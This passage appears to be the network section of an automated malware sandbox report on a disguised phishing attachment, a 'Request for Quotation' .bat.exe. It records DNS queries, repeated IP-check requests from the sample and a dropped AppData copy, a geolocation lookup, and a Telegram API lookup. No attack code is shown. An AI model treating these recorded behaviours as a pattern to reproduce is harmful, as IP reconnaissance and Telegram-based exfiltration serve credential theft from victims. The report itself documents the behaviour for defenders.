Nov 21, 2024 12:20:13.061778069 CET	53	52719	1.1.1.1	192.168.2.9
Nov 21, 2024 12:20:40.397984028 CET	56594	53	192.168.2.9	1.1.1.1
Nov 21, 2024 12:20:40.626763105 CET	53	56594	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 12:20:10.580370903 CET	192.168.2.9	1.1.1.1	0x8269	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:12.831824064 CET	192.168.2.9	1.1.1.1	0xb7fd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:40.397984028 CET	192.168.2.9	1.1.1.1	0x5f2d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 12:20:03.905925989 CET	1.1.1.1	192.168.2.9	0xb190	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 12:20:03.905925989 CET	1.1.1.1	192.168.2.9	0xb190	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:10.806102037 CET	1.1.1.1	192.168.2.9	0x8269	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:13.061778069 CET	1.1.1.1	192.168.2.9	0xb7fd	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:13.061778069 CET	1.1.1.1	192.168.2.9	0xb7fd	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 12:20:40.626763105 CET	1.1.1.1	192.168.2.9	0x5f2d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49720	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:10.945334911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:12.316953897 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f9c98db4db17b8edecb9382a2f079bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 12:20:12.348850012 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:12.764905930 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b7126e10304727dd26c7668f5e9262c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 12:20:14.800216913 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:15.215023041 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: aac08bdb88d1af356277b2b849c4855f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49740	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:16.389971972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:17.657229900 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0399e6ef3bc1751baf4b7ef2e3486b3d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 12:20:17.661041021 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:18.065586090 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c02afbc6c6fba24cd78ef94619c2247f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 12:20:20.016134024 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:20.421189070 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 45dbae6b2dfffb6a8b7eea0dddefcbf6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49741	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:17.064600945 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:18.424809933 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b1a15f6ddffc63825829fe255e17736 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49749	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:20.337147951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:21.602137089 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 041b7532b02b76f47a17e92bf0ce60fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49757	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:22.263870001 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 12:20:23.575783014 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1dabcba68772dd7f6f20f63cfd75e416 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49763	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:23.503763914 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:24.868138075 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65fc6866921be238ceca53196561cea0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49773	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:25.473340034 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:26.785577059 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 50b650adf8ee9d6841504a381bf40097 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49774	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:26.765824080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:28.079519033 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 459377dca5f281b431f51ff12d59e194 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49782	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:28.631906986 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:29.944485903 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3b0e57f9745a25611c0039653cd72d5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49788	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:29.930200100 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:32.242924929 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5fc41760e94a8ec5fcd515fdf6d0b4f7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49790	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:31.786822081 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:33.099962950 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d4c9bb543294d8b219ba0fb3c0e6aed2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49798	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:34.153079033 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:35.511667013 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fe0f7480b66c3fbf3a3d69bb7c34da72 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49804	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:34.969331980 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:36.235622883 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d2fde82cdcee36fd7838173e8cd2063e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49812	193.122.6.168	80	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:37.351619959 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:38.664212942 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5f17c580790531fc659476c498d80fc4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49813	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:38.081000090 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:39.397109032 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d9711135baa646479b48bf523530d52e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49827	193.122.6.168	80	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 12:20:41.235826015 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 12:20:42.501355886 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e415eff8b7c8568bfbc16f954c5bc69 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49727	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:14 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
